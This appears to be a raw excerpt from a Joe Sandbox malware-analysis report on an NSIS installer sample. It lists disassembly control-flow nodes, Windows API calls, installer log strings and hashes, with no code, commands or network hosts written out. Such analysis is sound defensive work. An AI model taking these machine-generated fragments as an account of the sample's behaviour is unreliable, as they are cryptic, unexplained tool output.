Control-flow Graph (graph for code block 4015a0-4015f4; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                              • BringToFront, xrefs: 004016BD
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                              • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                              • API String ID: 608394941-2746725676

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,QuarterWalt,QuarterWalt,00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$QuarterWalt
                                                                                                                                                                                                                                                                              • API String ID: 4286501637-4128698268

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                              • String ID: (]C$... %d%%$pAB$viB$y)B

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                              • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                              • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                              • String ID: Completed
                                                                                                                                                                                                                                                                              • API String ID: 2740478559-3087654605

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              control_flow_graph 795 401eb9-401ec4 796 401f24-401f26 795->796 797 401ec6-401ec9 795->797 798 401f53-401f69 GlobalAlloc call 406831 796->798 799 401f28-401f2a 796->799 800 401ed5-401ee3 call 4062cf 797->800 801 401ecb-401ecf 797->801 811 401f6e-401f7b 798->811 802 401f3c-401f4e call 406035 799->802 803 401f2c-401f36 call 4062cf 799->803 813 401ee4-402702 call 406831 800->813 801->797 804 401ed1-401ed3 801->804 817 402387-40238d GlobalFree 802->817 803->802 804->800 808 401ef7-402e50 call 406035 * 3 804->808 816 4030e3-4030f2 808->816 811->816 811->817 828 402708-40270e 813->828 817->816 828->816
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00634E08), ref: 00402387
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$QuarterWalt
                                                                                                                                                                                                                                                                              • API String ID: 1459762280-2380928645

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              control_flow_graph 830 402713-40273b call 406035 * 2 835 402746-402749 830->835 836 40273d-402743 call 40145c 830->836 838 402755-402758 835->838 839 40274b-402752 call 40145c 835->839 836->835 842 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 838->842 843 40275a-402761 call 40145c 838->843 839->838 843->842
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                              • String ID: <RM>$QuarterWalt$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                              • API String ID: 247603264-2360060177

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              control_flow_graph 851 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 862 402223-4030f2 call 4062cf 851->862 863 40220d-40221b call 4062cf 851->863 863->862
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                              • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 871 405eab-405eb7 872 405eb8-405eec GetTickCount GetTempFileNameW 871->872 873 405efb-405efd 872->873 874 405eee-405ef0 872->874 876 405ef5-405ef8 873->876 874->872 875 405ef2 874->875 875->876
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
